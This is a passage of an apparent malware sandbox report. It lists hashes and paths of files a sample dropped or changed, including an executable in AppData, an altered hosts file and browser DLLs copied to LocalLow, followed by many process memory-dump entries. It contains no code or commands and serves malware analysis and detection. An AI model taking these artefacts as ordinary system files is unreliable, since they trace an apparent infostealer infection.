SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
C:\Users\Admin\AppData\Roaming\U2g2ZBA3.exeFilesize
5.1MB
MD52438b851e157a3f70bd48af1984b2139
SHA1105ce31ecdce604bf8629ddc6580f2ad25fc21b5
SHA256bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
SHA512ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5ea6243fdb2bfcca2211884b0a21a0afc
SHA12eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA2565bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5065659124d9dd348476a53c4fb958bd6
SHA1f183b5807a73a8334168849911c2101265172098
SHA2560d5229666a881640e3dae3d737edb59eea7a475b2256233d237ba42b9f8aa91d
SHA512b8a018c55303786c1836a97c9fcb9bedefe4e6502b660d05848421d82271944940e511616c746dc157c24c8fa5ba0de0addca37fcd39bf06473b6f185ccf04da
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5af9eadaf7c64122dd17eedfe2b2b43e1
SHA12c94b4d14a90cb612b864629ba46604f8604d6d3
SHA256d2ada0cf04fa20b7d0f45f3d5b1d70e13e616b302e631207c6a5275d4ed63ae0
SHA512e08bebd6adbbe7766d6c2c41cab71c5cb49b820b65a5e505496a9592b134c0308c2915a73fd1d820912684ab5c00785579d4b027f7ed91e27b413eee1004797c
-
C:\Windows\system32\drivers\etc\hostsFilesize
3KB
MD5e546b81f1a1a1b753a4f6d3455394dec
SHA114f407db119dd97ed248be2a8d15a09ba938987a
SHA2561100d55448340b1a23c243209beb3aa1035a45912c346c00afb41181d9798de8
SHA51203f12755ae8c165323b2562b620731217b9f55affe782e6e07540131065b2edf5c465b5440d6b08c7a1a3d8541e423e8c9919ca768f72f830bc211bceb7fccfe
-
\Users\Admin\AppData\LocalLow\mozglue.dllFilesize
612KB
MD5f07d9977430e762b563eaadc2b94bbfa
SHA1da0a05b2b8d269fb73558dfcf0ed5c167f6d3877
SHA2564191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862
SHA5126afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf
-
\Users\Admin\AppData\LocalLow\nss3.dllFilesize
1.9MB
MD5f67d08e8c02574cbc2f1122c53bfb976
SHA16522992957e7e4d074947cad63189f308a80fcf2
SHA256c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e
SHA5122e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5
-
\Users\Admin\AppData\LocalLow\sqlite3.dllFilesize
1.0MB
MD5dbf4f8dcefb8056dc6bae4b67ff810ce
SHA1bbac1dd8a07c6069415c04b62747d794736d0689
SHA25647b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68
SHA512b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1
-
\Users\Admin\AppData\Roaming\FDFC.tmpMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Windows\System32\config\systemprofile\AppData\Roaming\7782.tmpMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/188-896-0x0000000000000000-mapping.dmp
-
memory/300-505-0x0000017506860000-0x000001750688A000-memory.dmpFilesize
168KB
-
memory/396-300-0x0000000000000000-mapping.dmp
-
memory/420-1135-0x0000000000000000-mapping.dmp
-
memory/432-507-0x000001CE13AB0000-0x000001CE13ADA000-memory.dmpFilesize
168KB
-
memory/584-290-0x0000000000000000-mapping.dmp
-
memory/592-304-0x0000000000000000-mapping.dmp
-
memory/632-493-0x00000285394A0000-0x00000285394CA000-memory.dmpFilesize
168KB
-
memory/724-502-0x0000023399500000-0x000002339952A000-memory.dmpFilesize
168KB
-
memory/860-509-0x0000026444680000-0x00000264446AA000-memory.dmpFilesize
168KB
-
memory/888-512-0x00000262B13D0000-0x00000262B13FA000-memory.dmpFilesize
168KB
-
memory/896-503-0x000001540C5D0000-0x000001540C5FA000-memory.dmpFilesize
168KB
-
memory/980-497-0x0000021130720000-0x000002113074A000-memory.dmpFilesize
168KB
-
memory/1032-295-0x0000000000000000-mapping.dmp
-
memory/1100-513-0x0000018A73280000-0x0000018A732AA000-memory.dmpFilesize
168KB
-
memory/1168-514-0x000001AA99770000-0x000001AA9979A000-memory.dmpFilesize
168KB
-
memory/1212-516-0x000001CC87580000-0x000001CC875AA000-memory.dmpFilesize
168KB
-
memory/1240-519-0x000001B2F5DF0000-0x000001B2F5E1A000-memory.dmpFilesize
168KB
-
memory/1248-522-0x000001F28B090000-0x000001F28B0BA000-memory.dmpFilesize
168KB
-
memory/1272-297-0x0000000000000000-mapping.dmp
-
memory/1316-524-0x000001A82C4B0000-0x000001A82C4DA000-memory.dmpFilesize
168KB
-
memory/1328-555-0x00000133400B0000-0x00000133400DA000-memory.dmpFilesize
168KB
-
memory/1392-527-0x000001BCE99A0000-0x000001BCE99CA000-memory.dmpFilesize
168KB
-
memory/1404-331-0x0000000000000000-mapping.dmp
-
memory/1428-529-0x0000016D558C0000-0x0000016D558EA000-memory.dmpFilesize
168KB
-
memory/1492-531-0x000001F8FA480000-0x000001F8FA4AA000-memory.dmpFilesize
168KB
-
memory/1500-533-0x000002A3208A0000-0x000002A3208CA000-memory.dmpFilesize
168KB
-
memory/1516-549-0x0000024EF5890000-0x0000024EF58BA000-memory.dmpFilesize
168KB
-
memory/1556-553-0x00000284619B0000-0x00000284619DA000-memory.dmpFilesize
168KB
-
memory/1656-548-0x00000201A1C40000-0x00000201A1C6A000-memory.dmpFilesize
168KB
-
memory/1720-545-0x000002238B280000-0x000002238B2AA000-memory.dmpFilesize
168KB
-
memory/1772-892-0x0000000000000000-mapping.dmp
-
memory/1772-289-0x0000000000000000-mapping.dmp
-
memory/1776-554-0x0000025E41CC0000-0x0000025E41CEA000-memory.dmpFilesize
168KB
-
memory/1788-544-0x000002A87E150000-0x000002A87E17A000-memory.dmpFilesize
168KB
-
memory/1828-542-0x0000023C5F440000-0x0000023C5F46A000-memory.dmpFilesize
168KB
-
memory/1852-303-0x0000000000000000-mapping.dmp
-
memory/1880-537-0x0000026AE3790000-0x0000026AE37BA000-memory.dmpFilesize
168KB
-
memory/1892-333-0x0000000000000000-mapping.dmp
-
memory/2012-539-0x00000000016F0000-0x000000000171A000-memory.dmpFilesize
168KB
-
memory/2060-357-0x0000000000000000-mapping.dmp
-
memory/2072-345-0x0000000000000000-mapping.dmp
-
memory/2136-556-0x0000022561040000-0x000002256106A000-memory.dmpFilesize
168KB
-
memory/2212-344-0x0000000000000000-mapping.dmp
-
memory/2212-520-0x0000024964E30000-0x0000024964E5A000-memory.dmpFilesize
168KB
-
memory/2224-557-0x00000240A1380000-0x00000240A13AA000-memory.dmpFilesize
168KB
-
memory/2300-343-0x0000000000000000-mapping.dmp
-
memory/2364-540-0x0000027877190000-0x00000278771BA000-memory.dmpFilesize
168KB
-
memory/2364-543-0x00000278771F0000-0x000002787721A000-memory.dmpFilesize
168KB
-
memory/2364-511-0x0000000000000000-mapping.dmp
-
memory/2540-342-0x00007FF7B99D1844-mapping.dmp
-
memory/2556-120-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2556-118-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2556-124-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2556-117-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2556-127-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2556-129-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2556-128-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2556-122-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2556-116-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2556-125-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2556-123-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2556-119-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2556-121-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2556-126-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2592-348-0x0000000000000000-mapping.dmp
-
memory/2692-562-0x0000015926CD0000-0x0000015926CFA000-memory.dmpFilesize
168KB
-
memory/2804-831-0x0000000000000000-mapping.dmp
-
memory/2828-340-0x0000000000000000-mapping.dmp
-
memory/2832-560-0x0000029C599F0000-0x0000029C59A1A000-memory.dmpFilesize
168KB
-
memory/2852-559-0x000001563DF40000-0x000001563DF6A000-memory.dmpFilesize
168KB
-
memory/2892-173-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-145-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-130-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/2892-137-0x000000000040779C-mapping.dmp
-
memory/2892-138-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-140-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-139-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-141-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-142-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/2892-143-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-144-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-146-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-147-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-148-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-149-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-150-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-151-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-152-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-153-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-154-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-155-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-156-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-157-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-158-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-159-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-160-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-161-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-162-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-163-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-164-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-165-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-166-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-167-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-168-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-169-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-170-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-171-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-172-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-174-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-175-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-176-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-177-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-178-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-180-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2892-179-0x0000000076EF0000-0x000000007707E000-memory.dmpFilesize
1.6MB
-
memory/2912-833-0x0000000000000000-mapping.dmp
-
memory/2912-383-0x0000000000000000-mapping.dmp
-
memory/2920-558-0x00000295156E0000-0x000002951570A000-memory.dmpFilesize
168KB
-
memory/2932-350-0x0000000000000000-mapping.dmp
-
memory/2952-201-0x0000000000000000-mapping.dmp
-
memory/3068-306-0x0000000000000000-mapping.dmp
-
memory/3092-869-0x0000000000000000-mapping.dmp
-
memory/3104-500-0x0000000000820000-0x000000000084A000-memory.dmpFilesize
168KB
-
memory/3300-291-0x0000000000000000-mapping.dmp
-
memory/3400-889-0x0000000000000000-mapping.dmp
-
memory/3404-318-0x0000000000000000-mapping.dmp
-
memory/3464-366-0x0000000000000000-mapping.dmp
-
memory/3536-615-0x0000000000000000-mapping.dmp
-
memory/3556-491-0x00007FFF0F6F0000-0x00007FFF0F79E000-memory.dmpFilesize
696KB
-
memory/3556-434-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/3556-440-0x00007FFF11B60000-0x00007FFF11D3B000-memory.dmpFilesize
1.9MB
-
memory/3556-425-0x00000001400033F4-mapping.dmp
-
memory/3608-863-0x0000000000000000-mapping.dmp
-
memory/3680-841-0x0000000000000000-mapping.dmp
-
memory/3692-829-0x0000000000000000-mapping.dmp
-
memory/3744-864-0x0000000000000000-mapping.dmp
-
memory/3772-551-0x00000000001C0000-0x00000000001EA000-memory.dmpFilesize
168KB
-
memory/3832-278-0x0000000000000000-mapping.dmp
-
memory/3920-347-0x0000000000000000-mapping.dmp
-
memory/4044-906-0x0000000000000000-mapping.dmp
-
memory/4056-525-0x0000027B6B3B0000-0x0000027B6B3DA000-memory.dmpFilesize
168KB
-
memory/4088-853-0x0000000000000000-mapping.dmp
-
memory/4100-353-0x0000000000000000-mapping.dmp
-
memory/4256-233-0x0000000000000000-mapping.dmp
-
memory/4256-239-0x0000022B981E0000-0x0000022B98202000-memory.dmpFilesize
136KB
-
memory/4256-243-0x0000022B98390000-0x0000022B98406000-memory.dmpFilesize
472KB
-
memory/4300-835-0x0000000000000000-mapping.dmp
-
memory/4364-279-0x0000000000000000-mapping.dmp
-
memory/4376-329-0x0000025B69860000-0x0000025B69872000-memory.dmpFilesize
72KB
-
memory/4376-225-0x0000025B68130000-0x0000025B68136000-memory.dmpFilesize
24KB
-
memory/4376-332-0x0000025B682E0000-0x0000025B682EA000-memory.dmpFilesize
40KB
-
memory/4376-222-0x0000025B689C0000-0x0000025B68E74000-memory.dmpFilesize
4.7MB
-
memory/4376-219-0x0000025B68120000-0x0000025B68126000-memory.dmpFilesize
24KB
-
memory/4376-216-0x0000025B65C10000-0x0000025B660E2000-memory.dmpFilesize
4.8MB
-
memory/4376-214-0x0000025B68EA0000-0x0000025B69372000-memory.dmpFilesize
4.8MB
-
memory/4404-877-0x0000000000000000-mapping.dmp
-
memory/4420-277-0x0000000000000000-mapping.dmp
-
memory/4464-354-0x0000000000000000-mapping.dmp
-
memory/4468-432-0x00007FFF11B60000-0x00007FFF11D3B000-memory.dmpFilesize
1.9MB
-
memory/4468-435-0x00007FFF0F6F0000-0x00007FFF0F79E000-memory.dmpFilesize
696KB
-
memory/4468-418-0x00000274D7F40000-0x00000274D7F80000-memory.dmpFilesize
256KB
-
memory/4476-286-0x0000000000000000-mapping.dmp
-
memory/4484-536-0x00000000067A0000-0x0000000006806000-memory.dmpFilesize
408KB
-
memory/4484-541-0x0000000006810000-0x0000000006876000-memory.dmpFilesize
408KB
-
memory/4484-561-0x0000000006CE0000-0x0000000006CFC000-memory.dmpFilesize
112KB
-
memory/4484-528-0x0000000006520000-0x0000000006542000-memory.dmpFilesize
136KB
-
memory/4484-546-0x00000000068A0000-0x0000000006BF0000-memory.dmpFilesize
3.3MB
-
memory/4484-408-0x0000000005240000-0x0000000005276000-memory.dmpFilesize
216KB
-
memory/4484-419-0x0000000005A70000-0x0000000006098000-memory.dmpFilesize
6.2MB
-
memory/4540-283-0x0000000000000000-mapping.dmp
-
memory/4540-887-0x0000000000000000-mapping.dmp
-
memory/4560-280-0x0000000000000000-mapping.dmp
-
memory/4572-852-0x0000000000000000-mapping.dmp
-
memory/4704-305-0x0000000000000000-mapping.dmp
-
memory/4740-349-0x0000000000000000-mapping.dmp
-
memory/4740-499-0x000002670FA70000-0x000002670FA9A000-memory.dmpFilesize
168KB
-
memory/4740-496-0x000002670FA40000-0x000002670FA63000-memory.dmpFilesize
140KB
-
memory/4864-645-0x00000000004039E0-mapping.dmp
-
memory/4884-875-0x0000000000000000-mapping.dmp
-
memory/4884-1139-0x0000000000000000-mapping.dmp
-
memory/4888-855-0x0000000000000000-mapping.dmp
-
memory/4932-899-0x0000000000000000-mapping.dmp
-
memory/5064-276-0x0000000000000000-mapping.dmp
-
memory/5080-275-0x0000000000000000-mapping.dmp
-
memory/5092-510-0x0000000000000000-mapping.dmp